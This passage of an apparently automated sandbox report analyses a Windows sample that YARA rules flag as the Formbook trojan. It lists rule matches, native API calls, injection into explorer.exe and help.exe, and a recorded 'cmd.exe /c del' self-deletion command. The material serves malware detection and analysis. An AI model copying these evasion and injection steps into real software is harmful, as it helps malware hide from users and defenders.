              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: S22Ls0H4Sz.exe PID: 5492, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 3320, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: help.exe PID: 1068, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Windows\SysWOW64\help.exeCode function: String function: 037CB150 appears 35 times
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A350 NtCreateFile,0_2_0039A350
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A400 NtReadFile,0_2_0039A400
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A480 NtClose,0_2_0039A480
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A530 NtAllocateVirtualMemory,0_2_0039A530
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A34A NtCreateFile,0_2_0039A34A
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A47A NtClose,0_2_0039A47A
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039A44A NtReadFile,0_2_0039A44A
              Source: C:\Windows\explorer.exeCode function: 1_2_047A8232 NtCreateFile,1_2_047A8232
              Source: C:\Windows\explorer.exeCode function: 1_2_047A9E12 NtProtectVirtualMemory,1_2_047A9E12
              Source: C:\Windows\explorer.exeCode function: 1_2_047A9E0A NtProtectVirtualMemory,1_2_047A9E0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809780 NtMapViewOfSection,LdrInitializeThunk,2_2_03809780
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809FE0 NtCreateMutant,LdrInitializeThunk,2_2_03809FE0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809710 NtQueryInformationToken,LdrInitializeThunk,2_2_03809710
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038096D0 NtCreateKey,LdrInitializeThunk,2_2_038096D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_038096E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809650 NtQueryValueKey,LdrInitializeThunk,2_2_03809650
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809A50 NtCreateFile,LdrInitializeThunk,2_2_03809A50
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03809660
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038099A0 NtCreateSection,LdrInitializeThunk,2_2_038099A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038095D0 NtClose,LdrInitializeThunk,2_2_038095D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03809910
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809540 NtReadFile,LdrInitializeThunk,2_2_03809540
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809840 NtDelayExecution,LdrInitializeThunk,2_2_03809840
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,2_2_03809860
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038097A0 NtUnmapViewOfSection,2_2_038097A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0380A3B0 NtGetContextThread,2_2_0380A3B0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809B00 NtSetValueKey,2_2_03809B00
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0380A710 NtOpenProcessToken,2_2_0380A710
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809730 NtQueryVirtualMemory,2_2_03809730
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809760 NtOpenProcess,2_2_03809760
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809770 NtSetInformationFile,2_2_03809770
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0380A770 NtOpenThread,2_2_0380A770
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809A80 NtOpenDirectoryObject,2_2_03809A80
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809A00 NtProtectVirtualMemory,2_2_03809A00
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809610 NtEnumerateValueKey,2_2_03809610
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809A10 NtQuerySection,2_2_03809A10
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809A20 NtResumeThread,2_2_03809A20
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809670 NtQueryInformationProcess,2_2_03809670
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038099D0 NtCreateProcessEx,2_2_038099D0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038095F0 NtQueryInformationFile,2_2_038095F0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809520 NtWaitForSingleObject,2_2_03809520
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0380AD30 NtSetContextThread,2_2_0380AD30
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809950 NtQueueApcThread,2_2_03809950
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809560 NtWriteFile,2_2_03809560
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038098A0 NtWriteVirtualMemory,2_2_038098A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_038098F0 NtReadVirtualMemory,2_2_038098F0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03809820 NtEnumerateKey,2_2_03809820
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0380B040 NtSuspendThread,2_2_0380B040
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA350 NtCreateFile,2_2_02DDA350
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA480 NtClose,2_2_02DDA480
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA400 NtReadFile,2_2_02DDA400
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA530 NtAllocateVirtualMemory,2_2_02DDA530
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA34A NtCreateFile,2_2_02DDA34A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA44A NtReadFile,2_2_02DDA44A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_02DDA47A NtClose,2_2_02DDA47A
              Source: S22Ls0H4Sz.exeStatic PE information: No import functions for PE file found
              Source: S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000E8F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
              Source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs S22Ls0H4Sz.exe
              Source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
              Source: S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
              Source: S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000009B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S22Ls0H4Sz.exe
              Source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs S22Ls0H4Sz.exe
              Source: S22Ls0H4Sz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: S22Ls0H4Sz.exeStatic PE information: Section .text
              Source: S22Ls0H4Sz.exeReversingLabs: Detection: 79%
              Source: S22Ls0H4Sz.exeVirustotal: Detection: 62%
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\S22Ls0H4Sz.exe C:\Users\user\Desktop\S22Ls0H4Sz.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
              Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/1@3/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: S22Ls0H4Sz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: help.pdbGCTL source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: help.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_00397168 pushfd ; iretd 0_2_0039716A
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_00397A35 push eax; iretd 0_2_00397A36
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_00396AE8 push FFFFFFE8h; ret 0_2_00396AF3
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0038E2C7 push cs; ret 0_2_0038E2D4
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_00397C76 push esp; ret 0_2_00397C79
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039D4A5 push eax; ret 0_2_0039D4F8
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039D4FB push eax; ret 0_2_0039D562
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exeCode function: 0_2_0039D4F2 push eax; ret 0_2_0039D4F8
